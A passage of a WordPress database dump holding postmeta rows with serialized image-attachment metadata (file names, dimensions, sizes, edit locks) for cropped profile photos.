:8:\"filesize\";i:179549;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"cropped-cropped-IMG_1240-scaled-1-e1697205792255-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6756;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"cropped-cropped-IMG_1240-scaled-1-e1697205792255-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108510;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"cropped-cropped-IMG_1240-scaled-1-e1697205792255-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:356981;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1654851670\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2372,1743,'_oembed_31f3137daa2d9eb3f0f9388b27d3858a','{{unknown}}'),(2373,1743,'_edit_lock','1697205685:1'),(2374,1743,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1908;s:6:\"height\";i:1909;s:4:\"file\";s:52:\"cropped-cropped-IMG_1240-scaled-1-e1697205792255.jpg\";}}'),(2375,1743,'_edit_last','1'),(2376,1744,'_wp_attached_file','2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg'),(2377,1744,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:299;s:6:\"height\";i:300;s:4:\"file\";s:68:\"2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\";s:8:\"filesize\";i:20814;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6487;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1654851670\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2378,1744,'_oembed_31f3137daa2d9eb3f0f9388b27d3858a','{{unknown}}'),(2379,966,'_edit_lock','1697206494:1'),(2380,966,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:475;s:6:\"height\";i:476;s:4:\"file\";s:16:\"cropped-Emma.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:24:\"cropped-Emma-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:24:\"cropped-Emma-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"full-1697205932363\";a:3:{s:5:\"width\";i:475;s:6:\"height\";i:475;s:4:\"file\";s:31:\"cropped-Emma-e1697205921392.jpg\";}}'),(2381,966,'_edit_last','1'),(2382,1745,'_wp_attached_file','2022/04/cropped-cropped-Emma-e1697205932363.jpg'),(2383,1745,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:47:\"2022/04/cropped-cropped-Emma-e1697205932363.jpg\";s:8:\"filesize\";i:21546;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"cropped-cropped-Emma-e1697205932363-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6990;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1566059384\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2384,1745,'_oembed_175522e41d614aabf89d800bc4567bf4','{{unknown}}'),(2385,1746,'_wp_attached_file','2023/09/cropped-anupam-e1697206626249.jpg'),(2386,1746,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:41:\"2023/09/cropped-anupam-e1697206626249.jpg\";s:8:\"filesize\";i:60710;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"cropped-anupam-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23735;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"cropped-anupam-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8306;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2387,1746,'_oembed_3c77fe3886e98506e43bf4680ae2d90c','{{unknown}}'),(2388,1746,'_edit_lock','1697206494:1'),(2389,1746,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:18:\"cropped-anupam.jpg\";}}'),(2390,1746,'_edit_last','1'),(2391,1747,'_wp_attached_file','2023/09/cropped-cropped-anupam-e1697206626249.jpg'),(2392,1747,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:49:\"2023/09/cropped-cropped-anupam-e1697206626249.jpg\";s:8:\"filesize\";i:23719;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"cropped-cropped-anupam-e1697206626249-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8106;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2393,1747,'_oembed_3c77fe3886e98506e43bf4680ae2d90c','{{unknown}}'),(2394,863,'_edit_lock','1697206536:1'),(2395,863,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:19:\"cropped-Ardavan.jpg\";}}'),(2396,863,'_edit_last','1'),(2397,1748,'_wp_attached_file','2022/03/cropped-cropped-Ardavan-e1697206676649.jpg'),(2398,1748,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:50:\"2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\";s:8:\"filesize\";i:13881;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"cropped-cropped-Ardavan-e1697206676649-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4359;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2399,1748,'_oembed_83882bcb12ff19f05b700a9bb533b2a6','{{unknown}}'),(2400,1749,'_wp_attached_file','2022/04/cropped-cropped-Jean-e1697206801281.jpg'),(2401,1749,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:47:\"2022/04/cropped-cropped-Jean-e1697206801281.jpg\";s:8:\"filesize\";i:292997;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"cropped-cropped-Jean-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14627;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"cropped-cropped-Jean-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111053;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"cropped-cropped-Jean-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4625;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:32:\"cropped-cropped-Jean-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70640;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"cropped-cropped-Jean-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:205647;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2402,1749,'_oembed_a0f37d608fb49347f752d39d16b65256','{{unknown}}'),(2403,1749,'_edit_lock','1697206662:1'),(2404,1749,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1932;s:6:\"height\";i:1932;s:4:\"file\";s:24:\"cropped-cropped-Jean.jpg\";}}'),(2405,1749,'_edit_last','1'),(2406,1750,'_wp_attached_file','2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg'),(2407,1750,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:55:\"2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\";s:8:\"filesize\";i:14601;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"cropped-cropped-cropped-Jean-e1697206801281-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4448;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2408,1750,'_oembed_a0f37d608fb49347f752d39d16b65256','{{unknown}}'),(2409,1751,'_wp_attached_file','2022/03/cropped-Basit-e1697206890221.jpg'),(2410,1751,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:40:\"2022/03/cropped-Basit-e1697206890221.jpg\";s:8:\"filesize\";i:358826;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"cropped-Basit-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11403;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"cropped-Basit-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94627;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"cropped-Basit-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4081;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"cropped-Basit-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54347;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:27:\"cropped-Basit-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:208717;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2411,1751,'_oembed_dcf0a26f9889a7e603983ea89707a663','{{unknown}}'),(2412,1751,'_edit_lock','1697206750:1'),(2413,1751,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1986;s:6:\"height\";i:1986;s:4:\"file\";s:17:\"cropped-Basit.jpg\";}}'),(2414,1751,'_edit_last','1'),(2415,1752,'_wp_attached_file','2022/03/cropped-cropped-Basit-e1697206890221.jpg'),(2416,1752,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:48:\"2022/03/cropped-cropped-Basit-e1697206890221.jpg\";s:8:\"filesize\";i:11380;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"cropped-cropped-Basit-e1697206890221-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3935;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2417,1752,'_oembed_dcf0a26f9889a7e603983ea89707a663','{{unknown}}'),(2418,1753,'_wp_attached_file','2023/09/cropped-sara-edwards1-e1697206932891.jpg'),(2419,1753,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:48:\"2023/09/cropped-sara-edwards1-e1697206932891.jpg\";s:8:\"filesize\";i:152648;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"cropped-sara-edwards1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15562;}s:5:\"large\";a:5:{s:4:\"file\";s:35:\"cropped-sara-edwards1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104343;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"cropped-sara-edwards1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8131;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"cropped-sara-edwards1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62110;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS M50m2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1662479582\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2420,1753,'_oembed_43e855edf367c4108d6a31733eab41bd','{{unknown}}'),(2421,1753,'_edit_lock','1697206791:1'),(2422,1753,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:25:\"cropped-sara-edwards1.jpg\";}}'),(2423,1753,'_edit_last','1'),(2424,1754,'_wp_attached_file','2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg'),(2425,1754,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:56:\"2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\";s:8:\"filesize\";i:15550;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:56:\"cropped-cropped-sara-edwards1-e1697206932891-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8032;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS M50m2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1662479582\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2426,1754,'_oembed_43e855edf367c4108d6a31733eab41bd','{{unknown}}'),(2427,1755,'_wp_attached_file','2022/04/cropped-cropped-cropped-Ryan-e1697207029774.jpg'),(2428,1755,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:55:\"2022/04/cropped-cropped-cropped-Ryan-e1697207029774.jpg\";s:8:\"filesize\";i:247530;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"cropped-cropped-cropped-Ryan-e1649958770354-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10360;}s:5:\"large\";a:5:{s:4:\"file\";s:57:\"cropped-cropped-cropped-Ryan-e1649958770354-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100478;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"cropped-cropped-cropped-Ryan-e1649958770354-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3875;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"cropped-cropped-cropped-Ryan-e1649958770354-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54068;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1576058051\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2429,1755,'_oembed_e7135b44271a7407470a47e2d6317b2e','{{unknown}}'),(2430,1755,'_edit_lock','1697206887:1'),(2431,1755,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1497;s:6:\"height\";i:1497;s:4:\"file\";s:47:\"cropped-cropped-cropped-Ryan-e1649958770354.jpg\";}}'),(2432,1755,'_edit_last','1'),(2433,1756,'_wp_attached_file','2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg'),(2434,1756,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:63:\"2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\";s:8:\"filesize\";i:10350;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"cropped-cropped-cropped-cropped-Ryan-e1697207029774-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3780;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1576058051\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2435,1756,'_oembed_e7135b44271a7407470a47e2d6317b2e','{{unknown}}'),(2436,874,'_edit_lock','1697206922:1'),(2437,874,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:21:\"cropped-Angelique.jpg\";}}'),(2438,874,'_edit_last','1'),(2439,1757,'_wp_attached_file','2022/03/cropped-cropped-Angelique-e1697207062254.jpg'),(2440,1757,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:52:\"2022/03/cropped-cropped-Angelique-e1697207062254.jpg\";s:8:\"filesize\";i:10805;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"cropped-cropped-Angelique-e1697207062254-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3534;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2441,1757,'_oembed_5a69c79d94917d98cd76f55e4aa509cf','{{unknown}}'),(2442,1394,'_edit_lock','1697207043:1'),(2443,1394,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:553;s:6:\"height\";i:537;s:4:\"file\";s:40:\"Screen-Shot-2023-09-26-at-9.33.41-PM.png\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:48:\"Screen-Shot-2023-09-26-at-9.33.41-PM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37825;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:48:\"Screen-Shot-2023-09-26-at-9.33.41-PM-300x291.png\";s:5:\"width\";i:300;s:6:\"height\";i:291;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:127495;}s:18:\"full-1697207183631\";a:3:{s:5:\"width\";i:537;s:6:\"height\";i:537;s:4:\"file\";s:55:\"Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207175304.png\";}}'),(2444,1394,'_edit_last','1'),(2445,1758,'_wp_attached_file','2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png'),(2446,1758,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:71:\"2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\";s:8:\"filesize\";i:131434;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:71:\"cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36453;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2447,1758,'_oembed_42fd6605b521b1de559be801c9d6a17a','{{unknown}}'),(2448,1759,'_wp_attached_file','2023/10/md-shah-sayem.jpg'),(2449,1759,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:705;s:6:\"height\";i:705;s:4:\"file\";s:25:\"2023/10/md-shah-sayem.jpg\";s:8:\"filesize\";i:55519;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"md-shah-sayem-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10865;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"md-shah-sayem-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4058;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2450,1760,'_wp_attached_file','2023/10/cropped-md-shah-sayem-e1697207514119.jpg'),(2451,1760,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:48:\"2023/10/cropped-md-shah-sayem-e1697207514119.jpg\";s:8:\"filesize\";i:49925;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"cropped-md-shah-sayem-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10923;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"cropped-md-shah-sayem-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4053;}}s:10:\"image_meta\";a:12:{s:8